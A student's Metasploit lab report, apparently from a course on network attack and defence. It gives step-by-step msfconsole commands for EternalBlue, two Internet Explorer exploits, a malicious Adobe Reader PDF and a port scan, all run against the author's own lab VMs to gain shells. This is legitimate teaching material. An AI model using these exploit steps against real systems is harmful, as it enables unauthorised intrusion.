20212421 2023-2024-2 《网络与系统攻防技术》实验六实验报告

一、实验内容及要求

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
1一个主动攻击实践,尽量使用最新的类似漏洞;
2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;
3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;
4 成功应用任何一个辅助模块。

二、实验过程

(1)一个主动攻击实践,尽量使用最新的类似漏洞

使用Nessus,对靶机进行漏洞扫描,结果如下:
在这里插入图片描述在这里插入图片描述发现有两个可以利用的漏洞MS17-010和MS16-047。

输入msfconsole,进入控制台,输入 search MS16-047 查看模块:
在这里插入图片描述发现没有相应的可攻击模块。输入MS17-010 进行查看:
在这里插入图片描述可以看出有几个模块,我选择第一个模块(永恒之蓝)进行攻击,输入use exploit/windows/smb/ms17_010_eternalblue 或者use 0
输入show options 查看:
在这里插入图片描述有yes的部分为必填的,可以看出我们只需要输入靶机的IP地址(192.168.223.132),并执行(exploit)即可:

在这里插入图片描述
ok,这时候就成功了。

(2)一个针对浏览器的攻击,尽量使用最新的类似漏洞

靶机为winxp(IP:192.168.223.133)
进入msf控制台,输入:

search Microsoft Internet Explorer//查找浏览器的漏洞模块

在这里插入图片描述使用第112个,输入:

use exploit/windows/browser/ms14_064_ole_code_execution
show options
set SRVHOST 192.168.223.128//设置监听地址,一般为0.0.0.0,但最好具体为攻击机的IP地址
set URIPATH 20212421ojy//设置url的路径名
exploit

在这里插入图片描述
在这里插入图片描述
在靶机中的浏览器中输入生成网址(http://192.168.223.128:8080/20212421ojy),等待一会儿,有会话会开启。输入sessions看开启的会话,输入sessions -i 1 选择你要的会话,就能获取靶机的shell了:
在这里插入图片描述
在这里插入图片描述我在桌面上创建了一个20212421的文件夹。

第二种:
再次使用攻击模块对浏览器进行攻击时,需要重新启动一下kali虚拟机。
在这里插入图片描述使用第29个攻击模块,输入:

use exploit/windows/browser/ms10_002_aurora
show options
set SRVHOST 192.168.223.128
set URIPATH 20212421_ojy
exploit

在这里插入图片描述

在这里插入图片描述
一样的将生成的url输入靶机浏览器中,等待开启会话,选择其中以后个会话进行攻击,获取shell:
在这里插入图片描述

(3)一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞

下载adobe reader,在靶机里进行安装:点击转下载页面
输入:

search adobe reader
use exploit/windows/fileformat/adobe_cooltype_sing 
show options
set FILENAME 20212421.pdf
exploit

在这里插入图片描述在这里插入图片描述生成了一个pdf文件,在/root/.msf4/local路径下
输入:

cd /root/.msf4/local//跳转到该文件目录
cp 20212421.pdf /home/oujinyuan.Desktop//复制到桌面上

在这里插入图片描述
将生成的pdf文件利用U盘放到靶机里,使用adobe reader打开该文件,就能获取靶机的shell了。

在这里插入图片描述
在这里插入图片描述

(4)成功应用任何一个辅助模块

在这里我使用的是端口扫描模块。
输入:

search portscan
use auxiliary/scanner/portscan/tcp//使用tcp扫描的方式
show options
set ports 1-1024
set rhost 192.168.223.132
set threads 20
exploit

在这里插入图片描述
在这里插入图片描述
可以看出靶机开启了135,139,445三个端口。

三、实验问题及解决方案

问题1:win7的IE8浏览器渗透失败

解决方案:使用search Microsoft Internet Explorer搜索出来的漏洞基本不能渗透IE8浏览器,所以换成了winxp虚拟机,对IE6浏览器进行渗透攻击,结果成功。

问题2:adobe reader安装失败和版本要求

解决方案:adobe reader安装的版本要9的,其他版本的不行。在winxp虚拟机上无法安装上adobe reader9(反正我没成功),最后在win7虚拟机上成功安装,并实验成功。

四、实验感悟

此次实验总体做下来还算可以,基本就是先搜索对应的攻击模块,选择一个,用options看还需哪些部分,补充完整,最后用exploit攻击就行。但最重要的还是对实验的理解,对漏洞利用的搜索、实践和学习,明白漏洞的适应与否。所以做完实验后,收获还是很大的。

五、实验参考

1:实验六 Metasploit攻击渗透实践 20192422李俊洁
2:20192409潘则宇 实验六 Metasploit攻击渗透实践

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值